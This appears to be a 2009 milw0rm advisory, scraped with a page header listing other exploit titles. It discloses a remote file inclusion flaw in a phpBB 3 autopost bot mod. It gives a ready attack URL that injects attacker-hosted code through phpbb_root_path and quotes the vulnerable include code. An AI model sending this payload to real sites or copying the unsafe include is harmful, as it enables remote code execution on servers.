
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
75 lines
2.3 KiB
Text
Executable file
75 lines
2.3 KiB
Text
Executable file
phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include Vulnerability
|
|
|
|
Vulnerability author: Kacper
|
|
|
|
Greetz: all DEVIL TEAM forum members.
|
|
|
|
|
|
Author Website: http://devilteam.pl/
|
|
http://polskihacking.pl/
|
|
|
|
|
|
|
|
Mod Description:
|
|
This mod automatically post content from RSS feed into destination forum.
|
|
MOD Download: http://phpbb3.smika.net/
|
|
Demo: http://phpbb3.smika.net
|
|
|
|
dont work when php5 or newest.
|
|
|
|
Vulnerability:
|
|
|
|
http://site.cz/forum_path/includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=[evil_code]
|
|
|
|
------------------------------------------------------------------
|
|
|
|
Bad codE:
|
|
|
|
includes/functions_lastrss_autopost.php - line 204 - 240:
|
|
|
|
[code]
|
|
if($config['lastrss_ap_enabled']) <-----{1}
|
|
{
|
|
// init & setup lastrss
|
|
// $rss can be already initiated by lastRSS agregator mod by SmiX
|
|
if(!isset($rss)) <-----{2}
|
|
{
|
|
require $phpbb_root_path . 'includes/class_lastrss.' . $phpEx; <-----{3}
|
|
$rss = new lastrss;
|
|
}
|
|
// init/change settings for lastrss autopost bot
|
|
$rss->cache_time = 0; // not used in this mod
|
|
$rss->items_limit = $config['lastrss_ap_items_limit']; // default limit of items to post
|
|
$rss->type = $config['lastrss_type']; // connection type (fopen / curl)
|
|
|
|
// init lastRSS autopost MOD !
|
|
// check if we have some feeds in database to check
|
|
$sql = 'SELECT *
|
|
FROM ' . LASTRSS_AP_TABLE . '
|
|
WHERE next_check < "' . time() . '" AND enabled = "1"';
|
|
$result = $db->sql_query($sql);
|
|
$row = $db->sql_fetchrow($result);
|
|
$db->sql_freeresult($result);
|
|
// so do we have some feeds to post ?
|
|
if(sizeof($row) > 0)
|
|
{
|
|
// we are already sure, that at least one feed exists!
|
|
$feed = get_next_feed_to_post();
|
|
}
|
|
|
|
// do we have some feed data ?
|
|
if (isset($feed) && (sizeof($feed) > 0))
|
|
{
|
|
// we are sure, we have feed info for checking the feed!
|
|
autopost_init($feed);
|
|
}
|
|
}
|
|
?>
|
|
[/code]
|
|
|
|
------------------------------------------------------------------
|
|
|
|
Zapraszam na forum DEVIL TEAM,
|
|
google:"DEVIL TEAM" lub http://6189.pl, http://devilteam.pl
|
|
|
|
# milw0rm.com [2009-02-20]
|